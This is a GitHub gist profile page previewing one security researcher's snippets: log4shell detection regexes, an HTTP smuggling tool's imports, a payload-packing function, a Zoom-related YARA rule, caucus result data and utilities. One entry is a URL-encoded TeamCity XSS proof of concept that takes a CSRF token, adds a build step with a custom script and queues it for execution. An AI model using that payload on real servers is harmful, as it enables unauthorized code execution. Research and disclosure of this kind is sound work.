Skip to content

Instantly share code, notes, and snippets.

Avatar

Karan Lyons karanlyons

64 followers · 10 following
View GitHub Profile
@karanlyons
karanlyons / log4shell_regexes.py
Last active March 7, 2022 03:49
log4shell Regexes
View log4shell_regexes.py
import re
from urllib.parse import unquote
FLAGS = re.IGNORECASE | re.DOTALL
ESC_DOLLAR = r'(?:\$|[\\%]u0024||\\x24|\\0?44|%24)'
ESC_LCURLY = r'(?:\{|[\\%]u007B|\\x7B|\\173|%7B)'
ESC_RCURLY = r'(?:\}|[\\%]u007D|\\x7D|\\175|%7D)'
_U_PERCENT_ESCAPE_RE = re.compile(r'%(u[0-9a-f]{4})', flags=FLAGS)
_PERCENT_ESCAPE_RE = re.compile(r'%[0-9a-f]{2}', flags=FLAGS)
@karanlyons
karanlyons / example.md
Last active May 1, 2020 08:15
pngen: Makes ECB PNGuins
View example.md

Plaintext:

Plaintext Penguin

Duplicate Plaintext Blocks:
	Total Blocks:                         358414
	Total Duplicates:                     349474
@karanlyons
karanlyons / IA.json
Created February 6, 2020 03:45
Iowa Caucus 2020 JSON Results
View IA.json
This file has been truncated, but you can view the full file.
{"Adair":{"4SE ORIENT":{"Bennet":{"First Expression":0.0,"Final Expression":0.0,"SDE":0.0},"Biden":{"First Expression":7.0,"Final Expression":7.0,"SDE":0.1569},"Bloomberg":{"First Expression":0.0,"Final Expression":0.0,"SDE":0.0},"Buttigieg":{"First Expression":6.0,"Final Expression":6.0,"SDE":0.1569},"Delaney":{"First Expression":0.0,"Final Expression":0.0,"SDE":0.0},"Gabbard":{"First Expression":0.0,"Final Expression":0.0,"SDE":0.0},"Klobuchar":{"First Expression":6.0,"Final Expression":6.0,"SDE":0.1569},"Patrick":{"First Expression":0.0,"Final Expression":0.0,"SDE":0.0},"Sanders":{"First Expression":6.0,"Final Expression":6.0,"SDE":0.0784},"Steyer":{"First Expression":0.0,"Final Expression":0.0,"SDE":0.0},"Warren":{"First Expression":9.0,"Final Expression":9.0,"SDE":0.2353},"Yang":{"First Expression":0.0,"Final Expression":0.0,"SDE":0.0},"Other":{"First Expression":0.0,"Final Expression":0.0,"SDE":0.0},"Uncommitted":{"First Expression":0.0,"Final Expression":0.0,"SDE":0.0}},"1NW ADAIR":{"Bennet":{"First Ex
@karanlyons
karanlyons / smuggler.py
Last active February 17, 2021 17:58
Burp Suite is for chumps.
View smuggler.py
#!/bin/env python3
import dataclasses
import re
import socket
import ssl as _ssl
import types
from collections import namedtuple, OrderedDict
from dataclasses import dataclass
from io import StringIO
from itertools import chain
@karanlyons
karanlyons / lazyString.ts
Last active August 7, 2019 06:50
Procrastinate till you evaluate.
View lazyString.ts
export type StringReturningFunction = (...args: any[]) => string;
interface LazyString extends String {}
interface LazyStringConstructor {
new <F extends StringReturningFunction>(
func: F,
...args: Parameters<F>
): LazyString;
<F extends StringReturningFunction>(func: F, ...args: Parameters<F>): string;
@karanlyons
karanlyons / format.ts
Last active August 6, 2019 12:08
Add translator friendly markup to translatable strings.
View format.ts
export type Formatters = { [k: string]: (s: string) => string };
export class FormatError extends Error {
constructor(
public message: string,
public str: string,
public formatters: Formatters,
public tag: string
) {
super();
@karanlyons
karanlyons / teamcity-poc-link.text
Last active December 19, 2019 21:33
TeamCity XSS RCE PoC
View teamcity-poc-link.text
https://builds.gradle.org/project.html?projectId=GradleProfiler&tab=problems%27%7D)%3B%7D)()%3B((w%2Cd%2Ch%2Cx%2Cn)%3D%3E%7Bw.p%7C%7C(w.p%3D1%2Cw.onerror%3D()%3D%3E1%2Cw.addEventListener(%22DOMContentLoaded%22%2C()%3D%3E%7Bw.history.replaceState(0%2Cd.title%2Ch.slice(0%2Ch.indexOf(%22%2527%22)))%3Bvar%20t%3Dd.querySelector(%22.tc-csrf-token-input%22).value%2Ce%3Dx(%60%2Fadmin%2FeditRunType.html%3Fid%3DbuildType%253A%24%7Bn%7D%26runnerId%3D__NEW_RUNNER__%26submitBuildType%3Dstore%60)%3Be.onloadend%3D()%3D%3E%7Bvar%20a%3Dx(%22%2Fajax.html%22)%3Ba.setRequestHeader(%22X-TC-CSRF-Token%22%2Ct)%3Ba.send(%60add2Queue%3D%24%7Bn%7D%26validate%3Dtrue%26redirectTo%60)%3B%7D%3Be.send(%60runTypeInfoKey%3DsimpleRunner%26buildStepName%3DRCE%2BDemo%26prop%253Ateamcity.step.mode%3Ddefault%26prop%253Ause.custom.script%3Dtrue%26prop%253Ascript.content%3Decho%2B%2522RCE%2Bvia%2BXSS%2522%26submitButton%3DSave%26tc-csrf-token%3D%24%7Bt%7D%60)%7D))%7D)(window%2Cdocument%2Clocation.href%2Cp%3D%3E%7Bvar%20x%3Dnew%20XMLHttpRequest()%3B
@karanlyons
karanlyons / payloadPack.js
Last active July 26, 2019 20:52
Char wise, byte foolish.
View payloadPack.js
const pack = s =>
s.match(/^[\u0000-\u00ff]*$/)
? s
.split("")
.map(s => s.charCodeAt())
.reduce(
(pairs, c) =>
(
!c || pairs[pairs.length - 1].length === 2
? pairs.push(...(c? [[c]] : [[c], []]))
@karanlyons
karanlyons / ZoomDaemon.yara
Last active July 12, 2021 14:07
Fixes for Zoom, RingCentral, Zhumu (and additional white labels) RCE vulnerabilities
View ZoomDaemon.yara
private rule Macho
{
meta:
description = "private rule to match Mach-O binaries (copied from Apple's XProtect)"
condition:
uint32(0) == 0xfeedface or uint32(0) == 0xcefaedfe or uint32(0) == 0xfeedfacf or uint32(0) == 0xcffaedfe or uint32(0) == 0xcafebabe or uint32(0) == 0xbebafeca
}
rule ZoomDaemon
{
@karanlyons
karanlyons / testcase.html
Last active March 20, 2019 01:01
WebKit RAF Inaccuracy (Related: https://github.com/whatwg/html/issues/2569)
View testcase.html
<html>
<head>
<style>
#left, #right, #test {
display: block;
z-index: 0;
}
#left {
float: left;